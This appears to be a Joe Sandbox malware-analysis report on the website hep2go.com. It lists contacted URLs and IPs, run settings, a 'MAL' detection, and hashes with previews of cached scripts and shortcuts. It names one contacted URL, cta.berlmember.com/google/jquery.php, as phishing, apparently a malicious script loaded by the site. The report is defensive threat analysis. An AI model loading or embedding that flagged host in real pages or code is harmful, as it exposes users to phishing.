                https://www.hep2go.com/images/log-in-index.jpgfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.hep2go.com/ajax/ur_get_user_name.phpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.hep2go.com/favicon.icofalse
                • Avira URL Cloud: safe
                		unknown
                https://www.hep2go.com/ajax/get_users.phpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.hep2go.com/javascript/user_ref.001.jsfalse
                • Avira URL Cloud: safe
                		unknown
                https://cta.berlmember.com/google/jquery.phptrue
                • Avira URL Cloud: phishing
                		unknown
                https://www.hep2go.com/javascript/scripts.002.js?rnd=733704651false
                • Avira URL Cloud: safe
                		unknown
                https://www.hep2go.com/javascript/cart.001.jsfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.hep2go.com/images/sign-up-index.jpgfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.hep2go.com/images/sign-up.jpgfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.hep2go.com/images/login.jpgfalse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                142.250.184.195
                		unknownUnited States
                		15169GOOGLEUSfalse
                1.1.1.1
                		unknownAustralia
                		13335CLOUDFLARENETUStrue
                216.58.206.40
                		unknownUnited States
                		15169GOOGLEUSfalse
                142.250.186.174
                		unknownUnited States
                		15169GOOGLEUSfalse
                172.217.18.14
                		unknownUnited States
                		15169GOOGLEUSfalse
                173.194.76.84
                		unknownUnited States
                		15169GOOGLEUSfalse
                103.52.144.214
                		cta.berlmember.comIndonesia
                		59147IDNIC-DRUPADI-AS-IDPTDrupadiPrimaIDfalse
                172.217.18.3
                		unknownUnited States
                		15169GOOGLEUSfalse
                216.58.206.36
                		unknownUnited States
                		15169GOOGLEUSfalse
                142.250.185.170
                		unknownUnited States
                		15169GOOGLEUSfalse
                239.255.255.250
                		unknownReserved
                		unknownunknownfalse
                142.250.185.142
                		unknownUnited States
                		15169GOOGLEUSfalse
                142.250.184.238
                		unknownUnited States
                		15169GOOGLEUSfalse
                142.250.186.72
                		unknownUnited States
                		15169GOOGLEUSfalse
                174.138.160.75
                		hep2go.comUnited States
                		20454SSASN2USfalse
                142.250.74.196
                		www.google.comUnited States
                		15169GOOGLEUSfalse

                Private

                IP
                192.168.2.16
                192.168.2.4

                General Information

                Joe Sandbox version:42.0.0 Malachite
                Analysis ID:1615208
                Start date and time:2025-02-14 16:40:11 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:defaultwindowsinteractivecookbook.jbs
                Sample URL:http://hep2go.com
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:13
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • EGA enabled
                Analysis Mode:stream
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal56.win@18/24@15/175

                Warnings

                • Exclude process from analysis (whitelisted): SgrmBroker.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 142.250.184.195, 142.250.185.142, 173.194.76.84, 142.250.185.78, 142.250.184.238, 142.250.184.206, 142.250.186.174, 216.58.206.40, 142.250.186.72, 2.19.106.160, 4.175.87.197, 13.107.253.45
                • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, otelrules.azureedge.net, www.googletagmanager.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com, www.google-analytics.com
                • Not all processes where analyzed, report is missing behavior information
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • VT rate limit hit for: http://hep2go.com

                Created / dropped Files

                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Feb 14 14:40:49 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2673
                Entropy (8bit):3.9920554650260085
                Encrypted:false
                SSDEEP:
                MD5:3DB95636355AFFF11FF390F2262081BA
                SHA1:5560F2665D449BD8C7A90FED7EC096F074A9C97D
                SHA-256:8CE8303382E98CF45F4CC9C3367387CD0763140600C87C2DBEE702B8499E7121
                SHA-512:DB9EADE4A1036E38C0859D305B8D8B726F01E68D2BB7E5DCAB8BE0F518BF7F4F7A73759B07AA9DD9C1AE83E9BFF3783BE5EBE04F9EA0DD3E005571D054D685CE
                Malicious:false
                Reputation:unknown
                Preview:L..................F.@.. ...$+.,.....0...~..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.INZ.}....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VNZ.}....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VNZ.}....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VNZ.}..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VNZ.}...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............../.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Feb 14 14:40:49 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2675
                Entropy (8bit):4.007486347016147
                Encrypted:false
                SSDEEP:
                MD5:D8B5987F55FCE7B3CD33BB8BB5603941
                SHA1:41E42F9035B3C51E19915AA18EBEA2FC1FD6F7CD
                SHA-256:97D72A4D3958FCEB64FEC0F954706ABC2EE5725D85F14E3B912AC4DA0BBAF1A0
                SHA-512:08AA134EDE9491F342B58DFBBDC7D5347CDE489654D29F9BBE16F9DAD09446794E81737C1EF967664B0FEB4AB7D007B60961FD1B4E673A08BD1A315EDD46A534
                Malicious:false
                Reputation:unknown
                Preview:L..................F.@.. ...$+.,......}..~..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.INZ.}....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VNZ.}....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VNZ.}....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VNZ.}..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VNZ.}...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............../.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2689
                Entropy (8bit):4.01401607773186
                Encrypted:false
                SSDEEP:
                MD5:36B9F4BF0BAF5D48C51AE7D3D104CE4D
                SHA1:9F2D5E956655E467DFE2AADAC5729B14E8A0B991
                SHA-256:3AEF2DA56872009BB36CCB74AD8E847C13AE4C25753D6179D6A56A0E850C213B
                SHA-512:C1476A2C6BB1DD923352D9491B55B54DACBA6F19DAE50F7ECDD259D7F0ABCB4A6AA95E5C7CC36D72CD2E3DE7FDD0AD073BB0CB598370DB68C5EA4A449495530F
                Malicious:false
                Reputation:unknown
                Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.INZ.}....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VNZ.}....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VNZ.}....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VNZ.}..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............../.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Feb 14 14:40:49 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2677
                Entropy (8bit):4.001678277348366
                Encrypted:false
                SSDEEP:
                MD5:3ECA2F86EEBF47C09F3955079187DB55
                SHA1:254E70CD970168755DE87A3F381EE43845EFCDD2
                SHA-256:E0E66C02E7A8B049F01DAB89A4701B858E047CAAAAC6F6CB6726A0A9808716DC
                SHA-512:BA8E65C54809769A79888DFC5C8A5B2E693FBB174F0F342EF5472CB2AC92320BDF2C6874BEA2B2E71E1DDD25FBEBD1739EF61237CF9A2DCA4C74E2BD863D8D6F
                Malicious:false
                Reputation:unknown
                Preview:L..................F.@.. ...$+.,......x..~..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.INZ.}....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VNZ.}....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VNZ.}....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VNZ.}..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VNZ.}...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............../.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Feb 14 14:40:49 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2677
                Entropy (8bit):3.9917232354660204
                Encrypted:false
                SSDEEP:
                MD5:F7C0B7C4E9FF5302B80D58539B8BBCAB
                SHA1:FF80ED466807243BB0256A1F93CC7BFB00F1DD19
                SHA-256:59F8749569C513D22010188FB87920D8931A51D6EF168A0D01F4897B6BE0EB69
                SHA-512:000DD30BF6FE96F17A00A8CEC52C8BE4993D5449D35BE5B90737E1FD37CD323D12AEAB28C443B8C33DC0EBD0A6C8E83D06397202CC69D4A8DE637B0C3D9B34D1
                Malicious:false
                Reputation:unknown
                Preview:L..................F.@.. ...$+.,........~..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.INZ.}....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VNZ.}....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VNZ.}....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VNZ.}..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VNZ.}...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............../.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Feb 14 14:40:49 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2679
                Entropy (8bit):4.0021265981062495
                Encrypted:false
                SSDEEP:
                MD5:26F3A427A04A4BCFBBF171B093C0EA74
                SHA1:5ABB7B8369EEAA8F5BB971416F3D13DA7F651BC3
                SHA-256:D7F8448CF7B0FA923E24A55D5CFFB7D8FF5A54D88CCCDE45093F7C155B12A8AD
                SHA-512:B776E65F78F8EB68A694B0E51C988CB5FE175E6F13D016D0216C7268D38AA6E2B83F168F7785B068544F0DE2BAED205CC0BD9E00D0922BB97531653E1EAEC24A
                Malicious:false
                Reputation:unknown
                Preview:L..................F.@.. ...$+.,......m..~..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.INZ.}....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VNZ.}....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VNZ.}....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VNZ.}..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VNZ.}...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............../.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                Chrome Cache Entry: 100

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:GIF image data, version 89a, 60 x 60
                Category:downloaded
                Size (bytes):11399
                Entropy (8bit):7.3875751803389695
                Encrypted:false
                SSDEEP:
                MD5:A4F1B4E5BA8012CFC75A803FB0A85858
                SHA1:FDDC19EE12350974CC8A766DB2ED6893629A3A45
                SHA-256:F76AC5EC61361D5C9A9963AC3170EEFF796DD2E590BB7786AD9C86BE77B658A7
                SHA-512:1D89ED5B43F950D03757D1FD2D6106169077F1D440FA094FE5018D09C9DD66C3FFD68DA955A421362B42A647B6538C172B046B935E819D7D34D1FE485260F1B9
                Malicious:false
                Reputation:unknown
                URL:https://www.hep2go.com/images/progress.gif
                Preview:GIF89a<.<.....Bq.Es.HuP}.R..]..^..`..`..b..............................................................!.......!..NETSCAPE2.0.....,....<.<..... .di... I.p,.tM.....*.o...G8!q.8..L...........i.......i.r...glS....o.=H7.Exj.H|}k..e....-...`..[....n.u....J...V.....}........................................................................}.t..........I AN...;X&.....8..1....a|cpc.... ...."2O.drq%K.._>...%M.6o..3../~.m!.h0.C}"M.t)S.N..U...!.......,....<.<...Bq.Es.HuO}.P}.R..^..^..`..`..b.......................................................... .di.A. J.p,.tM.....*.o...G8!q.8.q.&.iLJ...:............N..60./.K...|.{|}t.-..J.."jz...u..p.~.M.)...........k.............z.............................................................................R!.F,..K.'pJ..A....$..q...'..h. ..?J.)...pI...C...+*_..HQ....m...I.C.n.*.'Q.F..@ ..R..j>e..).bM.*Mj..P.G.&.Z...T!..!.......,....<.<...Bq.Es.HuO}.P}.R..^..^..`..`..b..........................................

                Chrome Cache Entry: 101

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:ASCII text, with very long lines (5960)
                Category:dropped
                Size (bytes):303200
                Entropy (8bit):5.598966824499731
                Encrypted:false
                SSDEEP:
                MD5:12463006F7F00A870357B2911073BAEB
                SHA1:9D615FF9BFC31508CC7DCA5D1E966749FF5F3047
                SHA-256:39D3E8A702B6F892A4AF04EEA8386CF78AEF95F65594BDA3B95EC54F9E1669B7
                SHA-512:6559B5F439B8FA0FA81330CB6D1E3F573AF67E7A43681F657B16EDFE36797BA6D496A2FEA484398AE795560F575C35ECC6F3B9CED3C1063D5EAF5C8359B6C24D
                Malicious:false
                Reputation:unknown
                Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":6,"vtp_value":true,"tag_id":10},{"function":"__ogt_referral_exclusion","priority":6,"vtp_includeConditions":["list","hep2go\\.com"],"tag_id":12},{"function":"__ogt_session_timeout","priority":6,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":13},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR",

                Chrome Cache Entry: 102

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:ASCII text
                Category:dropped
                Size (bytes):20517
                Entropy (8bit):5.109335510325792
                Encrypted:false
                SSDEEP:
                MD5:5C935567C029B01DE09437E4D6B9AA5E
                SHA1:C29A54C7B2A68AA82FB2CA25603C437A5B3BD098
                SHA-256:5422E23654BF2DC270C91128FBD11F67D33257AF2683240DBF5A6840F44D32D9
                SHA-512:B4FCEA37BA0BEF0563D23723ADC98BA8A4C5836578E632E5544EE76B602E5C3BEB4C352A535FD3850C75B25635B1BE79FBCA4835A4DBA33E50D3F13034401F48
                Malicious:false
                Reputation:unknown
                Preview:/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ..Author..: Ch.Raja Shekar..Description : Javascripts for hep2go.com..Date..: Oct 24'th - 2009..Updates..:. * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */ ..function inQuotes( text ).{..return ('"'+ text +'"');.}..function nonNull( text ).{..return ( !(text == null || text == "" || text == 'undefined') );.}..function ensureElementValue( id, variable, query, errorMessage).{..var element = document.getElementById( id );..if(!element)..{...alert(query + " failure");...return(false);..}..else..{...if( nonNull(element.value)) return element.value;...if(element.type != 'hidden') element.focus();.....if( nonNull(errorMessage))....alert( errorMessage );...else....alert( variable +" value is Null. Please enter valid value for "+ inQuotes(variable));.......return(false);..}.}..function strings_match(str1, str2, match_case ).{..if(str1 == str2) return true;..if(match_case)...return (str1 == str2);..else..{...i

                Chrome Cache Entry: 103

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:ASCII text, with very long lines (5960)
                Category:downloaded
                Size (bytes):303178
                Entropy (8bit):5.598993991749311
                Encrypted:false
                SSDEEP:
                MD5:7123054006C081327FD35C421014B1E3
                SHA1:0074E23B1B8F34B868E1AC75985A4E3FB57739E6
                SHA-256:4AAA084646D8301A81EF16B71315B887566A29CA20E30FB64E0F502C7C25641D
                SHA-512:3F7CA800B3BB87C2062629A100593C3AB02C31C9ED9CC18E3C7E8AB5764661C44BB1D923C0BAFE8019E2E6EE2F2D736E0F2B3268D7C0E917251C4AD431E988D7
                Malicious:false
                Reputation:unknown
                URL:https://www.googletagmanager.com/gtag/js?id=G-WMZXJKTR1T&cx=c&_slc=1
                Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":6,"vtp_value":true,"tag_id":10},{"function":"__ogt_referral_exclusion","priority":6,"vtp_includeConditions":["list","hep2go\\.com"],"tag_id":12},{"function":"__ogt_session_timeout","priority":6,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":13},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR",

                Chrome Cache Entry: 105

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 118x20, components 3
                Category:dropped
                Size (bytes):3429
                Entropy (8bit):7.783168929797866
                Encrypted:false
                SSDEEP:
                MD5:BEBF7FFE3BA97386DFF80A094FB5B1FC
                SHA1:41C2BF9C88FD5553B7B6329DA25ACB7B3E7611F8
                SHA-256:9056857615D96D0D739DD7A0CD20D2D9F97F551884FE16494EA5192103EA7280
                SHA-512:F2B1ED8C1ED02534DFF2416C6FF651721EA6FD884B3530DA45534EDF178CE25DE8FF4E91FC47D264578DEFE6E1402DE9FF9B9D668234CCA7F540C78E0CCCC5EC
                Malicious:false
                Reputation:unknown
                Preview:......JFIF.....H.H.....C....................................................................C.........................................................................v........................................#................................................................!...........................................?.....w.{..qJ.......g.4....a............?....XC........fs.7..........u......|.q.{...=......}...~<....G.!t...}...._/....>*....7z....o......."NN...8.........^".....Ge..Q.n.<..../'$g.w....F:G.......A.y...2....-...Z.P.....V.q]?....K./#.<......:........B.I..Kp..|..O...'....s.....,:.]......6Se.DV.....E....,.\..;/.*.{u....Yy9#?S...'.1.<.g..]X.b......#.h(.{oJukYC.l>cmX..t..VW.]..l..`..........K.....O...M...*...lOS;...)..0Xu...]..=.C.l..5.w.8......,.........u..p...0.,K.Yo0..|.._..:......rI.~....... u....J.D....G.)...............*..#.T=$N............7`...O.|-.Vp.....C|..D.#...".M....[_.\{.Q''y...s/...H.M8........v>....E.e.>Ep!"..>C.K.....nNGVa\5..8==.!...

                Chrome Cache Entry: 107

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:ASCII text, with very long lines (32038)
                Category:downloaded
                Size (bytes):95957
                Entropy (8bit):5.39099763946861
                Encrypted:false
                SSDEEP:
                MD5:895323ED2F7258AF4FAE2C738C8AEA49
                SHA1:276C87FF3E1E3155679C318938E74E5C1B76D809
                SHA-256:ECB916133A9376911F10BC5C659952EB0031E457F5DF367CDE560EDBFBA38FB8
                SHA-512:C40111C3CC0754E90CF71F72F7F16F43B835B7E808423DFD99F90DD5177538B702E64FF1D9EE8D3BC86AEAA11B6F7A0EF826184E354B162158839FFB75D174CC
                Malicious:false
                Reputation:unknown
                URL:https://www.hep2go.com/javascript/jquery-1.11.3.min.js
                Preview:/*! jQuery v1.11.3 | (c) 2005, 2015 jQuery Foundation, Inc. | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.3",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){ret

                Chrome Cache Entry: 108

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:ASCII text, with very long lines (2343)
                Category:downloaded
                Size (bytes):52916
                Entropy (8bit):5.51283890397623
                Encrypted:false
                SSDEEP:
                MD5:575B5480531DA4D14E7453E2016FE0BC
                SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                Malicious:false
                Reputation:unknown
                URL:https://www.google-analytics.com/analytics.js
